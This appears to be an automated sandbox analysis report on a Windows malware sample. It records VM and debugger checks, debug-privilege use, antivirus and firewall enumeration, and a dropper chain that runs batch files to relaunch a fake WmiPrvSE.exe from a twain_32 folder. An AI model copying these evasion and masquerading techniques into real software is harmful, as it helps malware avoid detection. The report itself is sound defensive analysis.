Source: WmiPrvSE.exe, 0000001B.00000002.2157976799.000000001B620000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: WmiPrvSE.exe, 00000009.00000002.1804469408.000000001BB08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: WmiPrvSE.exe, 0000002F.00000002.2511950701.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}M
Source: WmiPrvSE.exe, 0000002F.00000002.2511950701.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: WmiPrvSE.exe, 00000009.00000002.1792979636.0000000001163000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllYYuvP
Source: w32tm.exe, 00000029.00000002.2418340094.0000024BCA0D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
Source: work.exe, 00000003.00000003.1670700211.0000000002D34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yQW
Source: WmiPrvSE.exe, 00000016.00000002.2034484726.000000001AFB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: w32tm.exe, 00000034.00000002.2579878792.000001DF2A777000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
Source: WmiPrvSE.exe, 00000016.00000002.2036691639.000000001B4A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}v
Source: WmiPrvSE.exe, 00000025.00000002.2387430048.000000001B9F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: pfwa.exe, 00000004.00000002.1664228759.0000000001262000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1905081350.0000000001307000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2020609690.0000000000868000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001B.00000002.2132092550.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2437216243.0000000001859000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000035.00000002.2599886559.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003A.00000002.2732059685.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000003E.00000002.2782908697.000001B867117000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003F.00000002.2801269858.00000000016C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: WmiPrvSE.exe, 00000020.00000002.2244382852.000000000159C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll44
Source: WmiPrvSE.exe, 00000025.00000002.2367084199.000000000110C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllpp
Source: WmiPrvSE.exe, 0000003A.00000002.2768917158.000000001BAF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00BA0A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00BA0A0A

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA91B0 mov eax, dword ptr fs:[00000030h]		0_2_00BA91B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A091B0 mov eax, dword ptr fs:[00000030h]		3_2_00A091B0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00BAD1F0 GetProcessHeap,

0_2_00BAD1F0

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA0A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BA0A0A
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA0B9D SetUnhandledExceptionFilter,	0_2_00BA0B9D
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA0D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00BA0D8A
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA4FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BA4FEF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A00A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00A00A0A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A00B9D SetUnhandledExceptionFilter,	3_2_00A00B9D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A00D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00A00D8A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A04FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00A04FEF

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NpnD5G3qEA.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZXPLL9zJFP.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UO0HaVbJ1O.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\v8evR6XBmk.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3LXAY36iRv.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NqvJKoZOIs.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rq9fLK5Nyj.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Vs6Gb3dzjw.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\diBg3fIzhe.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nBqbaEi3SG.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\g3J0tdP0ue.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00B9BEFF SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree,

0_2_00B9BEFF

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00BA0826 cpuid

0_2_00BA0826

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		0_2_00B9C093
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		3_2_009FC093

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00B9F05C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00B9F05C

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00B8C365 GetVersionExW,

0_2_00B8C365

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: WmiPrvSE.exe, 00000009.00000002.1804469408.000000001BAD1000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1919315964.000000001BC10000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2020609690.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2034484726.000000001AFB0000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001B.00000002.2158498353.000000001B680000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001B.00000002.2132092550.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2244382852.000000000159C000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2262813857.000000001BE64000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2262813857.000000001BE9E000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000025.00000002.2387430048.000000001B930000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2459083857.000000001C050000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
